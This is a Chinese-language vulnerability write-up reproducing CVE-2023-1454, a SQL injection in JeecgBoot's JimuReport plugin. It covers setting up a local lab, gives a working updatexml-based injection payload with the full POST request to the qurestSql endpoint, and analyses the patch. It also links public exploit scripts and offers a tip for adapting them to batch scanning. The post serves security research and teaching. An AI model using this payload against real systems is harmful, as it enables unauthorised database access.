CVE-2023-1454注入分析复现

admin 2024年10月16日21:49:08评论25 views字数 1702阅读5分40秒阅读模式

CVE-2023-1454注入分析复现

简介

JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。

影响版本

Jeecg-Boot<=3.5.1

环境搭建

idea+

后端源码:

https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip

前端源码:

https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip

安装npm,安装nodejs

https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi

CVE-2023-1454注入分析复现
CVE-2023-1454注入分析复现

安装yarn

npm install -g yarn
CVE-2023-1454注入分析复现

下载依赖

yarn install
yarn run serve  //起服务
CVE-2023-1454注入分析复现

由于是前后端分离,需要数据库导入表,使用navicat直接导入即可

CVE-2023-1454注入分析复现

后端服务端搭建,使用idea搭建导入项目,修改数据库配置

CVE-2023-1454注入分析复现

配置server端npm服务

CVE-2023-1454注入分析复现

配置好之后直接启动,访问

http://localhost:3100/login

CVE-2023-1454注入分析复现

搭建成功

漏洞复现

前后端分离,后端端口8080 ,Payload:

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64; rv:109.0)Gecko/20100101Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length:128

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
CVE-2023-1454注入分析复现

分析

漏洞产生点位于积木报表插件内,查看更新的3.5.1的版本更新

CVE-2023-1454注入分析复现

更改了72处的文件,其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql中重写了数据插入的方法

jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了对sql语句的正则

CVE-2023-1454注入分析复现

这个修复是针对于后端的SQL注入,/sys/duplicate/check

CVE-2023-1454注入分析复现

目前最新更新的3.5.1版本似乎依旧没有针对积木报表注入点儿的加固措施,修复时更换jar包

CVE-2023-1454注入分析复现

目前积木官方的jar包已升级。

关注积木5月份的升级日志

http://jimureport.com/doc/log

CVE-2023-1454注入分析复现

小结

github上有师傅们的脚本,但是如果要批量使用的话建议在修改一下response的内容,仅仅只有操作失败的报错的话会存在大批量的报错。

CVE-2023-1454注入分析复现

所有自定义的if判断的回显都建议修改一下,如有错误欢迎指出。

参考连接

http://jimureport.com/doc/log

https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln

https://github.com/padbergpete47/CVE-2023-1454

原文始发于微信公众号(合天网安实验室):CVE-2023-1454注入分析复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月16日21:49:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-1454注入分析复现http://cn-sec.com/archives/1887788.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息